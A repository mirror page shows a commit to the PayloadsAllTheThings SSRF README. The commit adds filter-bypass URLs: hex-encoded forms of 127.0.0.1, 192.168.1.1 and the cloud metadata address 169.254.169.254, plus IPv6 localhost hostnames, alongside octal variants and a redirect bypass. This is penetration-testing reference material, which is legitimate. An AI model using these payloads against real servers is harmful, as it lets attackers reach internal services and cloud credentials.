Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 08:54:40 +01:00
Code Issues Projects Releases Wiki Activity

Merge pull request #784 from HackingRepo/patch-2

Browse source 
Update README.md
This commit is contained in:
Swissky 2025-08-13 12:54:25 +02:00 committed by GitHub
commit ad79082eb4
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 14 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
Server Side Request Forgery/README.md
View file

@ -178,6 +178,12 @@ http://127.0.1
http://0o177.0.0.1/ = http://127.0.0.1 http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1 http://q177.0.0.1/ = http://127.0.0.1
``` ```
* Hex IP
```powershell
http://0x7f000001 = http://127.0.0.1
http://0xc0a80101 = http://192.168.1.1
http://0xa9fea9fe = http://169.254.169.254
```
### Bypass Using Different Encoding ### Bypass Using Different Encoding
@ -196,6 +202,14 @@ http://127.0.1
* Unicode encoding: In some languages (.NET, Python 3) regex supports unicode by default. `\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`. * Unicode encoding: In some languages (.NET, Python 3) regex supports unicode by default. `\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`.
### Bypassing via ipv6 hostname
* in Linux /etc/hosts contain this line `::1 localhost ip6-localhost ip6-loopback` but work only if http server running in ipv6
```powershell
http://ip6-localhost = ::1
http://ip6-loopback = ::1
```
### Bypassing Using a Redirect ### Bypassing Using a Redirect
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) 1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)